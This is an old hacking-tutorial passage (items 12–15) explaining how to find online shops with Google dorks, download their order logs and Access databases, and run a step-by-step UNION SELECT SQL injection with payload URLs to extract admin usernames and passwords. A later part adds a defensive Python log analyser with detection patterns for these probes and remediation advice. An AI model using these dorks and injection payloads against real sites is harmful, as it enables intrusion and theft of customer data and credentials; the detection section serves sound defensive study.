12: google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target with exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target with exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target with exploit order.log :--> http://www.xxxxx.com....iles/order.log
 
13: google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target with exploit :--> http://www.xxxxxx.co....base/order.mdb
after downloading the db, look at access for the user and password
 
14: 1/ search google: allinurl:"shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5
2/ find the error by adding '
 
--->http://victim.com/shopdisplayproducts.asp?id=5'
 
--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
 
If you don't see an error, then change id to cat
 
--->http://victim.com/shopdisplayproducts.asp?cat=5'
3/ if this shop has the error, then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
 
--->http://victim.com/shopdisplayproduct...on%20select%20   1%20from%20tbluser"having%201=1--sp_password
 
--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
 
4/ add 2,3,4,5,6.......until you see a nice table
 
add 2
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
 
...5,6,7,8,9.... until you see a table (e.g. ...47)
 
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.
 
5/ When you see a table, change 4 to fldusername and 22 to fldpassword; you will have the admin username and password
 
--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
 
6/ Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp
 
Didn't work? Then you have to find it yourself:
 
add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
 
--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
 
you'll see something like this (a lot of them):
 
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............
then guess the admin link by adding the above data until you find the admin links
 
15:
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the database,
try this when there is a dblocation:
xDblocation
resx
 
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If you see the error message, you have to try this:
****://***.victim.com/shop/shopping500.mdb
 
download the mdb file. You should be able to open it with any mdb file viewer; you should be able to find one at download.com
 
inside you should be able to find *** information,
and you should even be able to find the admin username and password for the website.
 
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
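From the defender's side, everything above leaves a very distinctive trail in the web server log: a bare quote that turns into a 500, then a run of UNION SELECT requests from one address whose column list grows by one each time (step 4 of item 14), plus direct GETs for .mdb and order.log files under the web root (items 12, 13 and 15). The following script is an added example, not code from the original page; it parses a constructed, simplified IIS W3C-style log (date, time, client IP, method, URI stem, query, status) that I made up for this illustration, and the regexes and the "served database file" rule are my own assumptions. The table and column names in the sample lines are the ones the page itself shows.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log in a simplified IIS W3C layout (added example data):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /shopdisplayproducts.asp id=5 200
2024-01-01 10:00:02 203.0.113.5 GET /shopdisplayproducts.asp id=5' 500
2024-01-01 10:00:03 203.0.113.5 GET /shopdisplayproducts.asp id=5'%20union%20select%201%20from%20tbluser%22having%201=1--sp_password 500
2024-01-01 10:00:04 203.0.113.5 GET /shopdisplayproducts.asp id=5'%20union%20select%201,2%20from%20tbluser%22having%201=1--sp_password 500
2024-01-01 10:00:05 203.0.113.5 GET /shopdisplayproducts.asp id=5'%20union%20select%201,2,3%20from%20tbluser%22having%201=1--sp_password 200
2024-01-01 10:00:06 198.51.100.9 GET /shop/shopping140.mdb - 200
2024-01-01 10:00:07 198.51.100.9 GET /shop/resx/shopping140.mdb - 404
2024-01-01 10:00:08 192.0.2.77 GET /shopdisplayproducts.asp cat=12 200
2024-01-01 10:00:09 192.0.2.77 GET /shop/order.log - 200
"""

UNION_RE = re.compile(r"union\s+select\s+(.*?)\s+from\b", re.I | re.S)
HAVING_RE = re.compile(r"having\s+1\s*=\s*1", re.I)
# Assumption for this example: an Access database or an order.log should never
# be served over HTTP at all, so any request for one is worth a finding.
EXPOSED_FILE_RE = re.compile(r"(\.mdb|/order\.log)$", re.I)


def parse_line(line):
    """Split one W3C-style line into a dict; returns None for blank/short lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, method, stem, query, status = parts
    return {
        "ip": ip, "method": method, "stem": stem,
        "query": "" if query == "-" else unquote_plus(query),
        "status": int(status),
    }


def classify(rec):
    """Return a list of tags for one parsed record (empty if nothing suspicious)."""
    tags = []
    q = rec["query"]
    if UNION_RE.search(q) or HAVING_RE.search(q) or "sp_password" in q.lower():
        tags.append("union_probe")
    elif "'" in q and rec["status"] >= 500:
        # A bare quote that produces a server error is step 2 of item 14:
        # the error check that precedes the UNION column counting.
        tags.append("quote_error_probe")
    if EXPOSED_FILE_RE.search(rec["stem"]):
        tags.append("db_file_served" if rec["status"] == 200 else "db_file_request")
    return tags


def analyze(log_text):
    """Run every line through classify() and summarise per source address."""
    findings = []
    columns_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if not tags:
            continue
        findings.append({"ip": rec["ip"], "stem": rec["stem"], "tags": tags})
        m = UNION_RE.search(rec["query"])
        if m:
            # Number of columns in the injected SELECT list: a rising sequence
            # from one client is the column-enumeration loop of step 4.
            columns_by_ip[rec["ip"]].append(m.group(1).count(",") + 1)
    return {
        "findings": findings,
        "column_enumeration": {ip: cols for ip, cols in columns_by_ip.items() if len(cols) >= 2},
        "served_db_files": [f["stem"] for f in findings if "db_file_served" in f["tags"]],
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for finding in report["findings"]:
        print(finding)
    print("column enumeration:", report["column_enumeration"])
    print("database files actually served:", report["served_db_files"])
```

The "served" entries are the ones to act on first: a 200 for a .mdb means the file is already gone, so the admin credentials it holds should be treated as compromised and rotated, and the file moved outside the web root (or the extension blocked by request filtering). The column-enumeration list is the higher-fidelity signal for the injection itself; the lasting fix there is a parameterised query rather than string-building the id into the SQL.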